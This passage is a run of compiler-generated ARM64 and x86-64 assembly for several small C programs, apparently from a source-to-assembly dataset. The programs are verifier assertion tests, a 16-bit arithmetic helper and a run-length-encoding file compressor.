w9, w9, w10 ldr w11, [sp, #16] mov w10, #2 mul w11, w10, w11 subs w9, w9, w11 ldr w11, [sp, #12] mul w10, w10, w11 add w9, w9, w10 subs w8, w8, w9 cset w8, eq and w0, w8, #0x1 bl ___VERIFIER_assert mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl ___VERIFIER_assert ## -- Begin function __VERIFIER_assert .p2align 4, 0x90 ___VERIFIER_assert: ## @__VERIFIER_assert .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) cmpl $0, -4(%rbp) jne LBB0_3 ## %bb.1: jmp LBB0_2 LBB0_2: xorl %eax, %eax ## kill: def $al killed $al killed $eax callq ___VERIFIER_error LBB0_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) callq ___VERIFIER_nondet_double cvttsd2si %xmm0, %eax movl %eax, -8(%rbp) callq ___VERIFIER_nondet_double cvttsd2si %xmm0, %eax movl %eax, -12(%rbp) movl -12(%rbp), %eax subl $1, %eax movl -12(%rbp), %ecx subl $1, %ecx imull %ecx, %eax cmpl -8(%rbp), %eax setl %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assume movl -8(%rbp), %eax movl $2, %ecx cltd idivl %ecx cmpl $1, %edx sete %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assume movl -12(%rbp), %eax shll $1, %eax addl $1, %eax movl %eax, -16(%rbp) movl $1, -20(%rbp) movl -12(%rbp), %eax imull -12(%rbp), %eax subl -8(%rbp), %eax movl %eax, -24(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_4 Depth 2 ## Child Loop BB1_8 Depth 2 movl -8(%rbp), %eax addl -24(%rbp), %eax shll $2, %eax movl -16(%rbp), %ecx imull -16(%rbp), %ecx movl -20(%rbp), %edx imull -20(%rbp), %edx subl %edx, %ecx movl -16(%rbp), %edx shll $1, %edx subl %edx, %ecx movl -20(%rbp), %edx shll $1, %edx addl %edx, %ecx cmpl %ecx, %eax sete %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assert cmpl $0, -24(%rbp) jne LBB1_3 ## %bb.2: jmp LBB1_12 LBB1_3: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_4 LBB1_4: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -8(%rbp), %eax addl -24(%rbp), %eax shll $2, %eax movl -16(%rbp), %ecx imull -16(%rbp), %ecx movl -20(%rbp), %edx imull -20(%rbp), %edx subl %edx, %ecx movl -16(%rbp), %edx shll $1, %edx subl %edx, %ecx movl -20(%rbp), %edx shll $1, %edx addl %edx, %ecx cmpl %ecx, %eax sete %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assert cmpl $0, -24(%rbp) jg LBB1_6 ## %bb.5: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_6: ## in Loop: Header=BB1_4 Depth=2 movl -24(%rbp), %eax subl -20(%rbp), %eax movl %eax, -24(%rbp) movl -20(%rbp), %eax addl $2, %eax movl %eax, -20(%rbp) jmp LBB1_4 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_8 LBB1_8: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -8(%rbp), %eax addl -24(%rbp), %eax shll $2, %eax movl -16(%rbp), %ecx imull -16(%rbp), %ecx movl -20(%rbp), %edx imull -20(%rbp), %edx subl %edx, %ecx movl -16(%rbp), %edx shll $1, %edx subl %edx, %ecx movl -20(%rbp), %edx shll $1, %edx addl %edx, %ecx cmpl %ecx, %eax sete %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assert cmpl $0, -24(%rbp) jl LBB1_10 ## %bb.9: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_11 LBB1_10: ## in Loop: Header=BB1_8 Depth=2 movl -24(%rbp), %eax addl -16(%rbp), %eax movl %eax, -24(%rbp) movl -16(%rbp), %eax addl $2, %eax movl %eax, -16(%rbp) jmp LBB1_8 LBB1_11: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_1 LBB1_12: movl -8(%rbp), %eax shll $2, %eax movl -16(%rbp), %ecx imull -16(%rbp), %ecx movl -20(%rbp), %edx imull -20(%rbp), %edx subl %edx, %ecx movl -16(%rbp), %edx shll $1, %edx subl %edx, %ecx movl -20(%rbp), %edx shll $1, %edx addl %edx, %ecx cmpl %ecx, %eax sete %al andb $1, %al movzbl %al, %edi callq ___VERIFIER_assert xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/6386868.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _upb ; -- Begin function upb .p2align 2 _upb: ; @upb .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 str x0, [sp, #88] str x1, [sp, #80] str x2, [sp, #72] str x3, [sp, #64] ldr x8, [sp, #72] and x8, x8, #0x7fff str x8, [sp, #16] ldr x8, [sp, #88] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_1 LBB0_1: ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: mov x8, #128 str x8, [sp, #56] b LBB0_8 LBB0_3: ldr x8, [sp, #88] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: mov x8, #65408 str x8, [sp, #56] b LBB0_7 LBB0_6: str xzr, [sp, #56] b LBB0_7 LBB0_7: b LBB0_8 LBB0_8: ldr x8, [sp, #80] asr x8, x8, #15 str x8, [sp, #48] ldr x8, [sp, #64] subs x8, x8, #40 cset w8, ge tbnz w8, #0, LBB0_13 b LBB0_9 LBB0_9: ldr x8, [sp, #48] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_11 b LBB0_10 LBB0_10: ldr x9, [sp, #80] mov x8, #65280 add x9, x8, x9, asr #8 mov x8, #65536 subs x8, x8, x9 and x8, x8, #0xffff str x8, [sp, #8] ; 8-byte Folded Spill b LBB0_12 LBB0_11: ldr x9, [sp, #80] mov x8, #65536 subs x8, x8, x9, asr #8 and x8, x8, #0xffff str x8, [sp, #8] ; 8-byte Folded Spill b LBB0_12 LBB0_12: ldr x8, [sp, #8] ; 8-byte Folded Reload str x8, [sp, #40] b LBB0_17 LBB0_13: ldr x8, [sp, #48] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_15 b LBB0_14 LBB0_14: ldr x9, [sp, #80] mov x8, #65408 add x9, x8, x9, asr #9 mov x8, #65536 subs x8, x8, x9 and x8, x8, #0xffff str x8, [sp] ; 8-byte Folded Spill b LBB0_16 LBB0_15: ldr x9, [sp, #80] mov x8, #65536 subs x8, x8, x9, asr #9 and x8, x8, #0xffff str x8, [sp] ; 8-byte Folded Spill b LBB0_16 LBB0_16: ldr x8, [sp] ; 8-byte Folded Reload str x8, [sp, #40] b LBB0_17 LBB0_17: ldr x8, [sp, #56] ldr x9, [sp, #40] add x8, x8, x9 and x8, x8, #0xffff str x8, [sp, #32] ldr x8, [sp, #80] ldr x9, [sp, #32] add x8, x8, x9 and x8, x8, #0xffff str x8, [sp, #24] ldr x0, [sp, #24] add sp, sp, #96 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _upb ## -- Begin function upb .p2align 4, 0x90 _upb: ## @upb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq -24(%rbp), %rax andq $32767, %rax ## imm = 0x7FFF movq %rax, -80(%rbp) cmpq $0, -8(%rbp) jne LBB0_3 ## %bb.1: cmpq $0, -80(%rbp) je LBB0_3 ## %bb.2: movq $128, -40(%rbp) jmp LBB0_8 LBB0_3: cmpq $0, -8(%rbp) je LBB0_6 ## %bb.4: cmpq $0, -80(%rbp) je LBB0_6 ## %bb.5: movq $65408, -40(%rbp) ## imm = 0xFF80 jmp LBB0_7 LBB0_6: movq $0, -40(%rbp) LBB0_7: jmp LBB0_8 LBB0_8: movq -16(%rbp), %rax sarq $15, %rax movq %rax, -48(%rbp) cmpq $40, -32(%rbp) jge LBB0_13 ## %bb.9: cmpq $0, -48(%rbp) je LBB0_11 ## %bb.10: movq -16(%rbp), %rcx sarq $8, %rcx addq $65280, %rcx ## imm = 0xFF00 movl $65536, %eax ## imm = 0x10000 subq %rcx, %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -88(%rbp) ## 8-byte Spill jmp LBB0_12 LBB0_11: movq -16(%rbp), %rcx sarq $8, %rcx movl $65536, %eax ## imm = 0x10000 subq %rcx, %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -88(%rbp) ## 8-byte Spill LBB0_12: movq -88(%rbp), %rax ## 8-byte Reload movq %rax, -56(%rbp) jmp LBB0_17 LBB0_13: cmpq $0, -48(%rbp) je LBB0_15 ## %bb.14: movq -16(%rbp), %rcx sarq $9, %rcx addq $65408, %rcx ## imm = 0xFF80 movl $65536, %eax ## imm = 0x10000 subq %rcx, %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -96(%rbp) ## 8-byte Spill jmp LBB0_16 LBB0_15: movq -16(%rbp), %rcx sarq $9, %rcx movl $65536, %eax ## imm = 0x10000 subq %rcx, %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -96(%rbp) ## 8-byte Spill LBB0_16: movq -96(%rbp), %rax ## 8-byte Reload movq %rax, -56(%rbp) LBB0_17: movq -40(%rbp), %rax addq -56(%rbp), %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -64(%rbp) movq -16(%rbp), %rax addq -64(%rbp), %rax andq $65535, %rax ## imm = 0xFFFF movq %rax, -72(%rbp) movq -72(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/1207565.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] mov w8, #1 sturb w8, [x29, #-25] strb wzr, [sp, #31] str wzr, [sp, #24] ldur w8, [x29, #-8] subs w8, w8, #3 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w8, #-1 stur w8, [x29, #-4] b LBB0_29 LBB0_2: ldur x8, [x29, #-16] ldr x0, [x8, #8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fopen str x0, [sp, #40] ldur x8, [x29, #-16] ldr x0, [x8, #16] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fopen str x0, [sp, #32] ldr x8, [sp, #40] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr x8, [sp, #32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w8, #-1 stur w8, [x29, #-4] b LBB0_29 LBB0_5: ldr x0, [sp, #40] mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill mov w2, #2 bl _fseek ldr x0, [sp, #40] bl _ftell mov x8, x0 stur w8, [x29, #-20] ldur w8, [x29, #-20] ; kill: def $x8 killed $w8 lsr x0, x8, #0 bl _malloc stur x0, [x29, #-40] ldur w8, [x29, #-20] lsl w8, w8, #1 ; kill: def $x8 killed $w8 lsr x0, x8, #0 bl _malloc ldr x1, [sp, #8] ; 8-byte Folded Reload str x0, [sp, #48] ldr x0, [sp, #40] mov w2, #0 bl _fseek ldur x0, [x29, #-40] ldur w8, [x29, #-20] mov x2, x8 ldr x3, [sp, #40] mov x1, #1 bl _fread stur wzr, [x29, #-24] ldur x8, [x29, #-40] ldrb w8, [x8] sturb w8, [x29, #-26] mov w8, #1 str w8, [sp, #20] b LBB0_6 LBB0_6: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB0_25 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_6 Depth=1 ldr w8, [sp, #24] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_17 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_6 Depth=1 ldur x8, [x29, #-40] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 ldrb w8, [x8, x9] ldurb w9, [x29, #-26] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_6 Depth=1 ldurb w8, [x29, #-25] add w8, w8, #1 sturb w8, [x29, #-25] b LBB0_16 LBB0_10: ; in Loop: Header=BB0_6 Depth=1 ldurb w8, [x29, #-25] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_14 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_6 Depth=1 mov w8, #1 str w8, [sp, #24] ldrb w8, [sp, #31] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldurb w8, [x29, #-26] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldurb w8, [x29, #-26] ldrb w9, [sp, #31] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_6 Depth=1 ldrb w8, [sp, #31] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] b LBB0_13 LBB0_13: ; in Loop: Header=BB0_6 Depth=1 ldur x8, [x29, #-40] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 add x8, x8, x9 ldrb w8, [x8] sturb w8, [x29, #-26] b LBB0_15 LBB0_14: ; in Loop: Header=BB0_6 Depth=1 ldurb w8, [x29, #-25] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldurb w8, [x29, #-26] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] mov w8, #1 sturb w8, [x29, #-25] ldur x8, [x29, #-40] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 add x8, x8, x9 ldrb w8, [x8] sturb w8, [x29, #-26] b LBB0_15 LBB0_15: ; in Loop: Header=BB0_6 Depth=1 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_6 Depth=1 b LBB0_23 LBB0_17: ; in Loop: Header=BB0_6 Depth=1 ldur x8, [x29, #-40] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 ldrb w8, [x8, x9] ldurb w9, [x29, #-26] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_19 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_6 Depth=1 ldurb w8, [x29, #-25] add w8, w8, #1 sturb w8, [x29, #-25] ldrb w8, [sp, #31] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] str wzr, [sp, #24] b LBB0_22 LBB0_19: ; in Loop: Header=BB0_6 Depth=1 ldurb w8, [x29, #-26] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldurb w8, [x29, #-26] ldrb w9, [sp, #31] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_21 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_6 Depth=1 ldrb w8, [sp, #31] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] b LBB0_21 LBB0_21: ; in Loop: Header=BB0_6 Depth=1 ldur x8, [x29, #-40] ldr w9, [sp, #20] ; kill: def $x9 killed $w9 add x8, x8, x9 ldrb w8, [x8] sturb w8, [x29, #-26] b LBB0_22 LBB0_22: ; in Loop: Header=BB0_6 Depth=1 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_6 Depth=1 b LBB0_24 LBB0_24: ; in Loop: Header=BB0_6 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_6 LBB0_25: ldr w8, [sp, #24] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_27 b LBB0_26 LBB0_26: ldurb w8, [x29, #-25] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldurb w8, [x29, #-26] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] b LBB0_28 LBB0_27: ldurb w8, [x29, #-26] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] ldrb w8, [sp, #31] ldr x9, [sp, #48] ldur w10, [x29, #-24] ; kill: def $x10 killed $w10 mov x11, x10 add w11, w11, #1 stur w11, [x29, #-24] add x9, x9, x10 strb w8, [x9] b LBB0_28 LBB0_28: ldr x3, [sp, #32] sub x0, x29, #20 mov x1, #4 mov x2, #1 str x2, [sp] ; 8-byte Folded Spill bl _fwrite ldr x1, [sp] ; 8-byte Folded Reload ldr x0, [sp, #48] ldur w8, [x29, #-24] mov x2, x8 ldr x3, [sp, #32] bl _fwrite ldur x0, [x29, #-40] bl _free ldr x0, [sp, #48] bl _free ldr x0, [sp, #32] bl _fclose ldr x0, [sp, #40] bl _fclose stur wzr, [x29, #-4] b LBB0_29 LBB0_29: ldur w0, [x29, #-4] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\nProvide input and output file names" l_.str.1: ; @.str.1 .asciz "rb" l_.str.2: ; @.str.2 .asciz "wb" l_.str.3: ; @.str.3 .asciz "\nUnable to open file\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movb $1, -25(%rbp) movb $0, -65(%rbp) movl $0, -72(%rbp) cmpl $3, -8(%rbp) je LBB0_2 ## %bb.1: leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $-1, -4(%rbp) jmp LBB0_29 LBB0_2: movq -16(%rbp), %rax movq 8(%rax), %rdi leaq L_.str.1(%rip), %rsi callq _fopen movq %rax, -56(%rbp) movq -16(%rbp), %rax movq 16(%rax), %rdi leaq L_.str.2(%rip), %rsi callq _fopen movq %rax, -64(%rbp) cmpq $0, -56(%rbp) je LBB0_4 ## %bb.3: cmpq $0, -64(%rbp) jne LBB0_5 LBB0_4: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $-1, -4(%rbp) jmp LBB0_29 LBB0_5: movq -56(%rbp), %rdi xorl %eax, %eax movl %eax, %esi movl $2, %edx callq _fseek movq -56(%rbp), %rdi callq _ftell ## kill: def $eax killed $eax killed $rax movl %eax, -20(%rbp) movl -20(%rbp), %eax movl %eax, %edi shlq $0, %rdi callq _malloc movq %rax, -40(%rbp) movl -20(%rbp), %eax shll $1, %eax movl %eax, %eax movl %eax, %edi shlq $0, %rdi callq _malloc movq %rax, -48(%rbp) movq -56(%rbp), %rdi xorl %eax, %eax movl %eax, %esi xorl %edx, %edx callq _fseek movq -40(%rbp), %rdi movl -20(%rbp), %eax movl %eax, %edx movq -56(%rbp), %rcx movl $1, %esi callq _fread movl $0, -24(%rbp) movq -40(%rbp), %rax movb (%rax), %al movb %al, -26(%rbp) movl $1, -76(%rbp) LBB0_6: ## =>This Inner Loop Header: Depth=1 movl -76(%rbp), %eax cmpl -20(%rbp), %eax jae LBB0_25 ## %bb.7: ## in Loop: Header=BB0_6 Depth=1 cmpl $0, -72(%rbp) jne LBB0_17 ## %bb.8: ## in Loop: Header=BB0_6 Depth=1 movq -40(%rbp), %rax movl -76(%rbp), %ecx ## kill: def $rcx killed $ecx movzbl (%rax,%rcx), %eax movzbl -26(%rbp), %ecx cmpl %ecx, %eax jne LBB0_10 ## %bb.9: ## in Loop: Header=BB0_6 Depth=1 movb -25(%rbp), %al addb $1, %al movb %al, -25(%rbp) jmp LBB0_16 LBB0_10: ## in Loop: Header=BB0_6 Depth=1 movzbl -25(%rbp), %eax cmpl $1, %eax jne LBB0_14 ## %bb.11: ## in Loop: Header=BB0_6 Depth=1 movl $1, -72(%rbp) movb -65(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movb -26(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movzbl -26(%rbp), %eax movzbl -65(%rbp), %ecx cmpl %ecx, %eax jne LBB0_13 ## %bb.12: ## in Loop: Header=BB0_6 Depth=1 movb -65(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) LBB0_13: ## in Loop: Header=BB0_6 Depth=1 movq -40(%rbp), %rax movl -76(%rbp), %ecx ## kill: def $rcx killed $ecx movb (%rax,%rcx), %al movb %al, -26(%rbp) jmp LBB0_15 LBB0_14: ## in Loop: Header=BB0_6 Depth=1 movb -25(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movb -26(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movb $1, -25(%rbp) movq -40(%rbp), %rax movl -76(%rbp), %ecx ## kill: def $rcx killed $ecx movb (%rax,%rcx), %al movb %al, -26(%rbp) LBB0_15: ## in Loop: Header=BB0_6 Depth=1 jmp LBB0_16 LBB0_16: ## in Loop: Header=BB0_6 Depth=1 jmp LBB0_23 LBB0_17: ## in Loop: Header=BB0_6 Depth=1 movq -40(%rbp), %rax movl -76(%rbp), %ecx ## kill: def $rcx killed $ecx movzbl (%rax,%rcx), %eax movzbl -26(%rbp), %ecx cmpl %ecx, %eax jne LBB0_19 ## %bb.18: ## in Loop: Header=BB0_6 Depth=1 movb -25(%rbp), %al addb $1, %al movb %al, -25(%rbp) movb -65(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movl $0, -72(%rbp) jmp LBB0_22 LBB0_19: ## in Loop: Header=BB0_6 Depth=1 movb -26(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movzbl -26(%rbp), %eax movzbl -65(%rbp), %ecx cmpl %ecx, %eax jne LBB0_21 ## %bb.20: ## in Loop: Header=BB0_6 Depth=1 movb -65(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) LBB0_21: ## in Loop: Header=BB0_6 Depth=1 movq -40(%rbp), %rax movl -76(%rbp), %ecx ## kill: def $rcx killed $ecx movb (%rax,%rcx), %al movb %al, -26(%rbp) LBB0_22: ## in Loop: Header=BB0_6 Depth=1 jmp LBB0_23 LBB0_23: ## in Loop: Header=BB0_6 Depth=1 jmp LBB0_24 LBB0_24: ## in Loop: Header=BB0_6 Depth=1 movl -76(%rbp), %eax addl $1, %eax movl %eax, -76(%rbp) jmp LBB0_6 LBB0_25: cmpl $0, -72(%rbp) jne LBB0_27 ## %bb.26: movb -25(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movb -26(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) jmp LBB0_28 LBB0_27: movb -26(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movb -65(%rbp), %dl movq -48(%rbp), %rax movl -24(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -24(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) LBB0_28: leaq -20(%rbp), %rdi movq -64(%rbp), %rcx movl $4, %esi movl $1, %edx callq _fwrite movq -48(%rbp), %rdi movl -24(%rbp), %eax movl %eax, %edx movq -64(%rbp), %rcx movl $1, %esi callq _fwrite movq -40(%rbp), %rdi callq _free movq -48(%rbp), %rdi callq _free movq -64(%rbp), %rdi callq _fclose movq -56(%rbp), %rdi callq _fclose movl $0, -4(%rbp) LBB0_29: movl -4(%rbp), %eax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\nProvide input and output file names" L_.str.1: ## @.str.1 .asciz "rb" L_.str.2: ## @.str.2 .asciz "wb" L_.str.3: ## @.str.3 .asciz "\nUnable to open file\n" .subsections_via_symbols
the_stack_data/168893153.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] str wzr, [sp, #8] mov w8, #2 str w8, [sp, #4] ldr w8, [sp, #8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB0_2 LBB0_2: ldr w8, [sp, #4] subs w8, w8, #3 cset w9, eq ; implicit-def: $x8 mov x8, x9 ands x8, x8, #0x1 cset w8, eq tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: adrp x0, l___func__.main@PAGE add x0, x0, l___func__.main@PAGEOFF adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #12 adrp x3, l_.str.1@PAGE add x3, x3, l_.str.1@PAGEOFF bl ___assert_rtn LBB0_4: b LBB0_5 LBB0_5: ldur w0, [x29, #-4] ldp x29, x30, [sp, #16] ; 